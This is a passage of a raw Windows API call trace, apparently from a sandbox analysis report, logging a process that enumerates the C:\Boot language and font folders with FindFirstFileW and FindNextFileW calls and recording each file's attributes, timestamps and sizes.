ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.213] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4853f40, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0197.213] FindClose (in: hFindFile=0x604678 | out: hFindFile=0x604678) returned 1 [0197.213] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.213] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="et-EE", cAlternateFileName="")) returned 1 [0197.213] FindFirstFileW (in: lpFileName="C:\\Boot\\et-EE\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6045b8 [0197.213] FindNextFileW (in: hFindFile=0x6045b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc487a0b9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.213] FindNextFileW (in: hFindFile=0x6045b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.214] FindNextFileW (in: hFindFile=0x6045b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0197.214] FindClose (in: hFindFile=0x6045b8 | out: hFindFile=0x6045b8) returned 1 [0197.214] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.214] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0197.214] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604478 [0197.215] FindNextFileW (in: hFindFile=0x604478, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000cf3a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef59a5b1, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.215] FindNextFileW (in: hFindFile=0x604478, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc487a0b9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.215] FindNextFileW (in: hFindFile=0x604478, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef59a5b1, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.215] FindNextFileW (in: hFindFile=0x604478, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef59a5b1, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.215] FindClose (in: hFindFile=0x604478 | out: hFindFile=0x604478) returned 1 [0197.215] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.215] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Fonts", cAlternateFileName="")) returned 1 [0197.216] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6049b8 [0197.220] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.220] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef782dd9, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x386467, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0197.220] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4a1dbea, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef81cc08, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x3b2e0a, dwReserved0=0x0, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0197.220] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4a902c2, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8771a7, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1e4d4b, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0197.220] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b4eed5, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8c4060, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x243588, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0197.220] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8e28b4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2ab6f, dwReserved0=0x0, dwReserved1=0x0, cFileName="malgunn_boot.ttf", cAlternateFileName="MALGUN~1.TTF")) returned 1 [0197.221] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8f4db4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2b506, dwReserved0=0x0, dwReserved1=0x0, cFileName="malgun_boot.ttf", cAlternateFileName="MALGUN~2.TTF")) returned 1 [0197.221] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9072c7, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2318a, dwReserved0=0x0, dwReserved1=0x0, cFileName="meiryon_boot.ttf", cAlternateFileName="MEIRYO~1.TTF")) returned 1 [0197.221] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4bc156a, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef918492, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2380b, dwReserved0=0x0, dwReserved1=0x0, cFileName="meiryo_boot.ttf", cAlternateFileName="MEIRYO~2.TTF")) returned 1 [0197.221] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4bc156a, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef92a947, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x27a1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="msjhn_boot.ttf", cAlternateFileName="MSJHN_~1.TTF")) returned 1 [0197.221] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef93ce3b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x281fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="msjh_boot.ttf", cAlternateFileName="MSJH_B~1.TTF")) returned 1 [0197.221] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef94dfcd, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x25b3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="msyhn_boot.ttf", cAlternateFileName="MSYHN_~1.TTF")) returned 1 [0197.221] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef95f141, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x26255, dwReserved0=0x0, dwReserved1=0x0, cFileName="msyh_boot.ttf", cAlternateFileName="MSYH_B~1.TTF")) returned 1 [0197.221] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef96ef3e, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xaf3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="segmono_boot.ttf", cAlternateFileName="SEGMON~1.TTF")) returned 1 [0197.221] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c0da69, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef97d9ab, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x14f66, dwReserved0=0x0, dwReserved1=0x0, cFileName="segoen_slboot.ttf", cAlternateFileName="SEGOEN~1.TTF")) returned 1 [0197.222] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef98c419, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x150a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="segoe_slboot.ttf", cAlternateFileName="SEGOE_~1.TTF")) returned 1 [0197.222] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef999ae4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xbfc3, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0197.222] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef999ae4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xbfc3, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0197.222] FindClose (in: hFindFile=0x6049b8 | out: hFindFile=0x6049b8) returned 1 [0197.223] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.223] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fr-CA", cAlternateFileName="")) returned 1 [0197.223] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-CA\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604738 [0197.224] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.224] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.224] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0197.224] FindClose (in: hFindFile=0x604738 | out: hFindFile=0x604738) returned 1 [0197.224] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.224] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0197.224] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604738 [0197.224] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.224] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13558, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0197.225] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ade2b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0197.225] FindNextFileW (in: hFindFile=0x604738, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ade2b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0197.225] FindClose (in: hFindFile=0x604738 | out: hFindFile=0x604738) returned 1 [0197.225] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0197.225] FindNextFileW (in: hFindFile=0x604938, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, 